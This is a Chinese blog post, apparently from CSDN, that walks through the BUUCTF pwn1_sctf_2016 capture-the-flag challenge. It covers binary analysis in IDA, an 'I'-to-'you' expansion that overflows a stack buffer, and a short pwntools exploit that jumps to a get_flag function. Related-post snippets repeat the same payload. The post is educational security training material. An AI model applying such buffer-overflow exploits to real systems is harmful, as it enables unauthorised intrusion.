BUUCTF pwn1_sctf_2016 1

最新推荐文章于 2024-10-13 11:33:23 发布

bug小空

最新推荐文章于 2024-10-13 11:33:23 发布

阅读量203

点赞数

分类专栏： # pwn 文章标签：网络安全 ctf pwn

本文链接：https://blog.csdn.net/qq_56313338/article/details/133828549

版权

pwn 专栏收录该内容

6 篇文章 0 订阅

订阅专栏

代码分析

查看文件信息然后进行反汇编

在这里插入图片描述
关键信息

32位
栈不可执行

IDA反汇编
在这里插入图片描述
说实话，这个应该是C++编写的程序，C++基础还是不行，我硬是没看懂这个代码

我查了一下字符串

在这里插入图片描述

这里的get_flag是函数，另一个应该就是执行的一个命令了
到IDA中查找
在这里插入图片描述

TAB切换到汇编，再空格

先给他地址记下 08048F0D

这里网上说是把 I 换成 you导致了溢出，输入I就多出了2个字符，s的空间为32字节，足够我们溢出8字节了

EXP

s距离BP为0x3C ,0x3C / 3 = 20，我们只需要20个I就能到达BP的位置，然后 + 4个字节填充BP

from pwn import *

p = remote("node4.buuoj.cn",28244)
p.sendline(flat([b"I" * 20, b'a'*4, 0x08048F0D]))
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

bug小空

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

安恒杯pwn1

04-25

"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目，利用了strcpy函数的栈溢出漏洞来获取shell。首先，我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1，运行起来后显示...

pwn1_sctf_20161

m0_74091653的博客

09-25

281

函数相对安全，因为它可以限制读取的字符数，防止缓冲区溢出。但是可以发现会将输入的 I 换成 you。发现fgetsg函数溢出0x3c。指向的字符数组中，直到遇到换行符。也就是我们可以用20个 I 来溢出。也找出了cat flag.txt。中读取字符，并将其存储在。这里我们正常溢出是不行的。

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF刷题之路-pwn1_sctf_20161

qq_30528603的博客

05-27

504

从我们的运行结果看，会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节，我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节，那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问题产生了，fgets函数较gets函数安全一点，他有长度限制，我们看到s离ebp的距离有0x3c那么远，但是fgets只能输入32个字节，只通过fgets溢出覆盖不到返回地址。看到有个fgets函数，并且限制长度为32。这是一个32位的程序，只开启了NX保护。

buuctf pwn1_sctf_20161

m0_74125780的博客

08-26

140

然后又发现有个fgets函数，但是它限制只有32个字节，双击s查看s的长度，0x3c，有60个字符长度，但是只能输入32个字符所以无法造成栈溢出。但观察函数的内容，并nc一下，发现I可以替换成you。所以输入20个I就刚好满足60长度，再加上4。首先用checksec检查，发现是32位的，所以用32位的ida打开。速度找到system函数，查看它的地址，记下来，0x8048F0D。最后编写脚本，运行得到flag。

BUUCTF pwn1_sctf_2016

CHAWUCIREN1的博客

04-08

3453

执行一下似乎出现第一个i被替换成you 检查一下保护机制丢到ida里面输入的变量s大小为0x3c，但是我们看fgets里面，我们只能输入32个字符，没法进行溢出，我们在输入的时候，会发现i会被替换成you，所以我们可以利用20个i来填充，找到shell，地址为0x8048F0D 返回地址再随便填四个字符我们可以构造一下payload payload = ‘I’*20 + p64(0x8048F0D) 这里特别注意一下 payload可以有多种写法 ‘I’ *19 + ‘A’*7 + p

pwn1_sctf_2016

weixin_56301399的博客

07-21

1794

这道题目的情况是多了个替换字符的函数，使得一个I在存储中变为you，一个字节变为三字节，这时候需要根据情况确定多少字符使得栈溢出。还是照常的流程，但题目已经开始变化了，我现在还是一知半解迷迷糊糊的状态，害，菜狗子还需努力。......

PWN (3) pwn1_sctf_2016 1

brightendavid的博客

05-11

494

查找字符串，发现了一个flag.txt。输入在这里限制为32长度的输入

get_started_3dsctf_2016|get_started_3dsctf_2016

12-11

网络安全逆向PWN题目，简单的栈溢出，虽然有后门函数，但同时又给了一定的限制条件，可以使用更复杂的ROP解法。该样本题解：https://blog.csdn.net/A951860555/article/details/111030289

Wi-PWN_8.0_ENGLISH_OLED.bin

08-25

这是ESP8266的带OLED显示的WIFI杀手固件。

PWM.rar_ARM7 汇编_PWN_pwm arm7

09-22

1. C语言源代码：这部分代码可能负责设置定时器参数、初始化PWM接口以及根据应用需求调整占空比。 2. ARM7汇编代码：可能包括更底层的定时器控制和中断处理函数，这些函数可能直接操作硬件寄存器以实现PWM功能。 ...

PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn

09-23

1. "PWN.c"：这很可能是 AVR 单片机的 C 语言源代码，实现了 PWM 输出功能。我们可以预期代码中包含了初始化 PWM 定时器、设置 PWM 配置、以及可能的 PWM 寄存器操作等内容。 2. "www.pudn.com.txt"：这个文件可能是...

buuctf之pwn1_sctf_2016

weixin_54452942的博客

03-27

727

简单易懂~

[每日一PWN]BUUCTF pwn1_sctf_2016

qq_55233040的博客

11-22

291

本题是利用字符替换达成溢出。

pwn-5-pwn1_sctf_20161

最新发布

zhi741的博客

10-13

321

拿到这道题我们先checksec,注意观察这个位置： PIE: No PIE (0x8048000)这句话告诉我们的是“当前的可执行文件不是一个位置无关的可执行文件，而是被加载到了一个固定的内存地址0x8048000” 目前我们就只需要知道这是一个固定的地址。但是不会无缘无故出现参数，v3还没有内容无法到达栈溢出点我们将其补齐就有了 20+4=24，虽然看着是24个字节但不能像我们之前那种写法，里面有I变you 由1字节变成3字节，剩下的4个字节我们可以字节任意编写。

[buuctf]pwn1_sctf_2016

逆向萌新的博客

05-30

1621

buuctf：pwn题pwn1_sctf_2016（细致分析）

./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory

09-02

这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它：对于 Ubuntu 或 Debian 系统： ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统： ``` sudo yum install libstdc++.so.6 ``` 请注意，根据你使用的操作系统和软件包管理器，命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器，并根据你的情况进行相应的调整。如果问题仍然存在，请提供更多的上下文信息，以便我可以提供更具体的解决方案。